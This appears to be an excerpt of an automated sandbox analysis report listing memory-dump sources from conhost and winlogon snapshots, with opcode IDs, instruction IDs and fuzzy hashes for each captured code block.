                                                                                                • Instruction ID: 6fcc22f50b54b78ae240e781f103aeb6d0a5a27b06e6277ee304f81b46d5670c
                                                                                                • Opcode Fuzzy Hash: 7ae844f7a6823ece56adf43a4e3d1d0ea095862588d1daea813473c40cbbb6d2
                                                                                                • Instruction Fuzzy Hash: 5E412821B1D6691EE30AB7BC74AA5F87B90DF49324B1804FFD04EC71FBDC18A8428285
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 622a15348f2f34da0442ed6a6419b19c81376432ccc8a949e69bb8fa1c7f465b
                                                                                                • Instruction ID: 5a8aee0d29eaee09d4b33e41250729198d7ac17eb4800ae4afd933aff7a387d2
                                                                                                • Opcode Fuzzy Hash: 622a15348f2f34da0442ed6a6419b19c81376432ccc8a949e69bb8fa1c7f465b
                                                                                                • Instruction Fuzzy Hash: 3C310421B1DA691FE359B7BC68AA6F977D1DF49325B0400FAD40EC71EBDC18A8428285
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 06041c352d0847b47fe8faaa3225ec18f0a0dde4ffbe6863e3dccdb9ba792b9d
                                                                                                • Instruction ID: e114c76ef1bfa3f3ef1521e23bdfdb047b12b278670c4c42147653d30f773e5b
                                                                                                • Opcode Fuzzy Hash: 06041c352d0847b47fe8faaa3225ec18f0a0dde4ffbe6863e3dccdb9ba792b9d
                                                                                                • Instruction Fuzzy Hash: DD31D830A1E69E8FDF55EB78C8659A97BF0FF1A310B0505FEC049CB1A3DA289945CB40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a4372858468ac3901774509dee68f5f05ca3355bee189ba375a30f0f320e433d
                                                                                                • Instruction ID: 5f5035ef71f441ae2a8217c558d698feedf27dec675e80230906cbaeb659259b
                                                                                                • Opcode Fuzzy Hash: a4372858468ac3901774509dee68f5f05ca3355bee189ba375a30f0f320e433d
                                                                                                • Instruction Fuzzy Hash: E9310820B1D95D1FE758A77C846A6B97BE2EF48311B0400BDD44EC72F7DC24AC418691
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2010e5859c756472a30761b866e2d21d8a90fc9300bde92f3a09a61dd3273927
                                                                                                • Instruction ID: e4b4bed8268ea8e8a83fedb7e7f0da6e520203c890d90c48f7208d000824ff9f
                                                                                                • Opcode Fuzzy Hash: 2010e5859c756472a30761b866e2d21d8a90fc9300bde92f3a09a61dd3273927
                                                                                                • Instruction Fuzzy Hash: 16212B35B1D26D8EE726A7B99C750EC3B60DF46324F1541B3C0488B1E3DA3866469BC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fe5a1047c464b4dc548f399d01c0fdbad4e908fcaa831eaed1d9b7408d4b529
                                                                                                • Instruction ID: 9f3385727d8b2cc08fc7197d39812b2f9c7c552fa47818446b52592a3d1c730f
                                                                                                • Opcode Fuzzy Hash: 2fe5a1047c464b4dc548f399d01c0fdbad4e908fcaa831eaed1d9b7408d4b529
                                                                                                • Instruction Fuzzy Hash: E8310C30E1856D8FEB64EB64C8657A972A1FB5C324F1501BDD41ED32E1CA39AE81CF81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb03ea30f86f86f15052075ada4d4a2d508b62150998cc3856ed7da703aad921
                                                                                                • Instruction ID: e937e15f948d3c27dfdbf5ec0682355f93cb35dc76ace9fff0c33b31d555ca63
                                                                                                • Opcode Fuzzy Hash: fb03ea30f86f86f15052075ada4d4a2d508b62150998cc3856ed7da703aad921
                                                                                                • Instruction Fuzzy Hash: 77111220B1A91E4FEBE4EFE498B57B87691EF5C300F5501B9C40DD72B2DE28AA448B40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b76f8001e1055fc7cc7995eb76a819d1b8f8aac81300f873391aee9d194f0473
                                                                                                • Instruction ID: 8997a36a2102db59481f1fcaa9c2102e68908c57ecca1e0767c3a9193018f56b
                                                                                                • Opcode Fuzzy Hash: b76f8001e1055fc7cc7995eb76a819d1b8f8aac81300f873391aee9d194f0473
                                                                                                • Instruction Fuzzy Hash: 9E11C231E1E69D8EE7129BB5886109C7BB0EF16710F1641F7C044CB2A2DA3866458B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f62d585235e03e8f0fe5cf0a0dc88fb439a0e9531e71ba5ed5e023e472b342d9
                                                                                                • Instruction ID: 02ffbbc4c60b9e41f35058e1a215d7689e49aadaf53e5ceef04bd1ed1fa450ae
                                                                                                • Opcode Fuzzy Hash: f62d585235e03e8f0fe5cf0a0dc88fb439a0e9531e71ba5ed5e023e472b342d9
                                                                                                • Instruction Fuzzy Hash: 5E017521B1D91D4BEB64EFB4D4646B933C2DF99310F1601B9D409C32B2DD18A9418A84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7ed9fce6a7932c94077c8a7c7e1cdb96515cfd114d964adc5cd2acaaf66fcb16
                                                                                                • Instruction ID: 8285b1c62ddee09ab4eb49582a742517658dadcdf118baf1e456ea4700d15cf2
                                                                                                • Opcode Fuzzy Hash: 7ed9fce6a7932c94077c8a7c7e1cdb96515cfd114d964adc5cd2acaaf66fcb16
                                                                                                • Instruction Fuzzy Hash: F9018031E1E29D8FE726DBB5886509C7FB0EF16714F1641F7C044DB2A2DA386A458B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 08c2f98e2a67823a2d8519ad407df271f1fb8afb570465d885b2f4b0543f544a
                                                                                                • Instruction ID: 93bba0e88be5f8192bc0a9bc9df80bf5d381f60d7cf4ddf76a13645dc2ff8268
                                                                                                • Opcode Fuzzy Hash: 08c2f98e2a67823a2d8519ad407df271f1fb8afb570465d885b2f4b0543f544a
                                                                                                • Instruction Fuzzy Hash: FD017130E1E29D9FE726DBB5886409C7FB0EF16714F1541F7C444CB2A2DA386A458B80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 7efc1e070507f1b1d07d279e7c1d3357dea427c20dbae2aa9f747e97543f9a0f
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 4CF0F430A1991E8BEBA4FFE0D8A4AF97761EB58311F510179C409D72B1DE286A85CF80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 060cffaca336cb0d3cfac3e1fad823875f99ad9445770e9cb950afdb95b0b036
                                                                                                • Instruction ID: 89929804f1129a3ade144ee934d94b0f149d3a4a3d2bd470e64644883acab6d7
                                                                                                • Opcode Fuzzy Hash: 060cffaca336cb0d3cfac3e1fad823875f99ad9445770e9cb950afdb95b0b036
                                                                                                • Instruction Fuzzy Hash: DFF0E53160A6498FC7469B38D8954D47B60EB47215B9A21FAC089C75B2C628585FCB41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e57fceeeb1556e59c31721969a994985ce87e26fce79365c099f9b97da087566
                                                                                                • Instruction ID: 2b5fb576462a97a68d41cc90a0280abca10e9ba81d939e967b6b9dd21a2095ce
                                                                                                • Opcode Fuzzy Hash: e57fceeeb1556e59c31721969a994985ce87e26fce79365c099f9b97da087566
                                                                                                • Instruction Fuzzy Hash: 76F03061F2E93E4AF7B0A7B484A57F812D1AF5D750F260075D40DE62A2CD28AE414EC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: b1876b50859ed9db4dcdf9f3d1a122a08009b8b64153dde116719c6c885c2f42
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 82F03020B1981D8BEBB0EFA0D8A47B93351EB58311F1101B9C509D32B2CD296E448A80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a12ba42d2772fbd531d00387a27c2661fbd7e5f5a2e514cbcc68567c7e54eecd
                                                                                                • Instruction ID: bb0b71db0e119aad0b71ace0cf3dfa25b560674216fb90dba21daac1676a3427
                                                                                                • Opcode Fuzzy Hash: a12ba42d2772fbd531d00387a27c2661fbd7e5f5a2e514cbcc68567c7e54eecd
                                                                                                • Instruction Fuzzy Hash: 7BF0B430B1960ECEE799DBB984656FD77E0EF58711F1486BAD009C32E5DE3866848F80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b8d27797306fd73d96015c4517b216a8a38743e521279fa42fc03ddc30c82e75
                                                                                                • Instruction ID: 7d015098312588179eefd7b797a84deca6f2673416c7af05800439fe414c5546
                                                                                                • Opcode Fuzzy Hash: b8d27797306fd73d96015c4517b216a8a38743e521279fa42fc03ddc30c82e75
                                                                                                • Instruction Fuzzy Hash: 69E06D61F2EC3E4BE7A4EB7880E6BB822D1AB5C740B160036C00ED22A2CD186D414BC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7734605258e9bed2857d83c954cc0893c646848e9d564eaef14a0b2ab1e8c6ed
                                                                                                • Instruction ID: 278bcd434d80bc33f9e646d8370b5db0c7af250244e73b344087bc28810dfb46
                                                                                                • Opcode Fuzzy Hash: 7734605258e9bed2857d83c954cc0893c646848e9d564eaef14a0b2ab1e8c6ed
                                                                                                • Instruction Fuzzy Hash: BAE01A61E29C3A0BE7A0AB6884E66F827D1AB58340F554176D819D72A2DE286D814BC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fed6537446232999c276a65cbd32d243c269a34746791fc3a8f2532be4c1c63
                                                                                                • Instruction ID: 4b64eea60694c8a02b0794d4527e08bd79eba3a0b25198a655777e53c068d5d2
                                                                                                • Opcode Fuzzy Hash: 2fed6537446232999c276a65cbd32d243c269a34746791fc3a8f2532be4c1c63
                                                                                                • Instruction Fuzzy Hash: BDC01214B5741A51D02873B9FC664F97750DF49228BC54071E00D85196DC4A158785D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 375cb32467d2f4ac292aaf916916b72a978876b3ef50655b2c11cd79ef034476
                                                                                                • Instruction ID: 1ad863d4ad4891dff2bd1592ac7df51e5d7c704c4dc007f839920a61924f49a7
                                                                                                • Opcode Fuzzy Hash: 375cb32467d2f4ac292aaf916916b72a978876b3ef50655b2c11cd79ef034476
                                                                                                • Instruction Fuzzy Hash: E7C01200F2B62E00E83433BB98220ACA100ABCEA10FD20032C048800A1980D228909C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction ID: 1838179f8fa27feb3d39b58db7078738cebefe2b4d6c9c489a30d4fa099db743
                                                                                                • Opcode Fuzzy Hash: 2118bf5cbd7652e4d7e413182c64878a5aedab47cc3b41951ae0b3348f6e1aca
                                                                                                • Instruction Fuzzy Hash: C2C08C30A1180C9FC908EB3CC88480433A0FB0E200BC200E0E009C7170D629DCC0CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4a50f83341a01f37ef2b5baf24b4aada6efe849e03db9de877caf255af67b747
                                                                                                • Instruction ID: 3c9cb42013c070cd61bf2fd63e5f2e7638b65c3cb84bac9127d66fb0e4f0ff17
                                                                                                • Opcode Fuzzy Hash: 4a50f83341a01f37ef2b5baf24b4aada6efe849e03db9de877caf255af67b747
                                                                                                • Instruction Fuzzy Hash: E9C0C910F2A42D96EAA8A3B584211FC80D29B49700B520478D04DD31E2DC1969004E84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 66c5ad7b955d66629afdb2344a6aa6bf7186fdcac4a69a8903ef197fd03b6da0
                                                                                                • Instruction ID: 1c546510ca24c66eac6b75310a345f12fe0367802b7919b791db1d0c77aaedfd
                                                                                                • Opcode Fuzzy Hash: 66c5ad7b955d66629afdb2344a6aa6bf7186fdcac4a69a8903ef197fd03b6da0
                                                                                                • Instruction Fuzzy Hash: 78C04C15F29C2A57E36A622848316BD04A29B44754F95007CE41D9B6DECD1C5E0216C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction ID: 63218d0c2e49ba43bc485c3db5fe95adfdcbe6a455a01f28a2e979715c15fde4
                                                                                                • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction Fuzzy Hash: 90B01200D6B45F00E42833FB08520647440AF4C104FC20070D44C80191984D229406C2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000031.00000002.2254533321.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_49_2_7ffd9b8b0000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845
                                                                                                • Opcode ID: 71d326ceebd15b301eb1fb1730b87dfcc78a94d6bfac99c4088267545aad56a9
                                                                                                • Instruction ID: 59ac16040a37b55d1682a8a5f16e21fb3a452759f4ae20953ca4ad1d0b06e41e
                                                                                                • Opcode Fuzzy Hash: 71d326ceebd15b301eb1fb1730b87dfcc78a94d6bfac99c4088267545aad56a9
                                                                                                • Instruction Fuzzy Hash: 7C51D082B1943785E31F33FD792A8FC6B44DF45379B4846B3E05E8A0EB5C88608392E5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5\_H
                                                                                                • API String ID: 0-3325266018
                                                                                                • Opcode ID: f7bc40702c86c09de912bae084baf116a9af870468519a6fc8df88420a2a0bc3
                                                                                                • Instruction ID: a22d808c4e0c7548f705e8031e72b2cefc2422ea6fbc55987b1b6a2ff7786963
                                                                                                • Opcode Fuzzy Hash: f7bc40702c86c09de912bae084baf116a9af870468519a6fc8df88420a2a0bc3
                                                                                                • Instruction Fuzzy Hash: 98912571A1DA8D8FE759DF688865BA97FE0FF59314F0400BED019D73E6DAB824018750
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 429a53fa1a50729638d547db63c9501c63be37b5d37372fd660d4f5a7ca7d9f3
                                                                                                • Instruction ID: f7a616dd5c580cf885e20b860530a99bcb682be598d1012618f1cbc2d9b70b21
                                                                                                • Opcode Fuzzy Hash: 429a53fa1a50729638d547db63c9501c63be37b5d37372fd660d4f5a7ca7d9f3
                                                                                                • Instruction Fuzzy Hash: E7415C12B0D5695EE309B7B874EA6FD7B91DF49328B0404FBD04DCB1EBDD1864428281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ae177c3c5c70837ed0ccd755c975fa9fdadef5038ec7b3ade0a8a9a27d7997a7
                                                                                                • Instruction ID: 3cc5a366d0f0172a739f796cea47694d90eb1e989b50fb6a9b7fb947ad31c735
                                                                                                • Opcode Fuzzy Hash: ae177c3c5c70837ed0ccd755c975fa9fdadef5038ec7b3ade0a8a9a27d7997a7
                                                                                                • Instruction Fuzzy Hash: 3E413A12B0D5695EE309B7B874EA5FC7B91DF49328B0444FBD04ECB1EBDD18A8428281
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d8d16a52bf548df697f64cb3916979726ce2736e49b9fad0fda673e8e26e92e4
                                                                                                • Instruction ID: 9859deb5f477de1214fb34e5c8a522b7b3b0cc65a21b283ae4304acd9a25a785
                                                                                                • Opcode Fuzzy Hash: d8d16a52bf548df697f64cb3916979726ce2736e49b9fad0fda673e8e26e92e4
                                                                                                • Instruction Fuzzy Hash: F9310811B1D5291FE358B7B878AE6B977C1DF48329B0400FED40EC71EBDC1CA8414291
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d26e5ef3d27cd0452ee787ce9726305cf5dc833e00a874a70b4203b28df26b40
                                                                                                • Instruction ID: c5467112f5159f126f212e6800bab22a6f09bc884a0f9d664e17b7544303d446
                                                                                                • Opcode Fuzzy Hash: d26e5ef3d27cd0452ee787ce9726305cf5dc833e00a874a70b4203b28df26b40
                                                                                                • Instruction Fuzzy Hash: 5331F830A1E68E8FDF55EBB4C8A59A97BF0FF1A310B0905FAC009CB1A3DA385941C740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01c343098ba38396a139132f4a55025d8880cffc694d959c9beb32ba3ae6b8a7
                                                                                                • Instruction ID: 5ab43c0a378e8752fe8c0736e1748f81de64fb171fa3d27a084aa929b1ee0803
                                                                                                • Opcode Fuzzy Hash: 01c343098ba38396a139132f4a55025d8880cffc694d959c9beb32ba3ae6b8a7
                                                                                                • Instruction Fuzzy Hash: 2D310A20B1D95D1FE798F76884AEA7977D2EF98315B0400BDD80EC72FBDD28A9418391
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 84c63fe50589cc35d4e53b96c742fce3415e5f75fc1e870a0bdbca15d7707404
                                                                                                • Instruction ID: 8405e861789c33c274e4c8a4657d2a6e50590c952a2b30489373b03bc59eaf27
                                                                                                • Opcode Fuzzy Hash: 84c63fe50589cc35d4e53b96c742fce3415e5f75fc1e870a0bdbca15d7707404
                                                                                                • Instruction Fuzzy Hash: 50214B32F1D2598EFB26A7E898A94EC3B60DF96328F1541B3D048CB1D3D9382647A351
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 58f38d80244e1fc81a6835145e6d15e71dc2ae30582d28ffb1273454c8233996
                                                                                                • Instruction ID: c25940a3119c82907be8617c8d22e04028772a826bd2e18544c67a04a8365bf2
                                                                                                • Opcode Fuzzy Hash: 58f38d80244e1fc81a6835145e6d15e71dc2ae30582d28ffb1273454c8233996
                                                                                                • Instruction Fuzzy Hash: AE314D31E1851D8FEB64EB54C8A47AD72A1FB5C324F1501BDD41ED32E1CA396E80DB41
                                                                                                Memory Dump Source
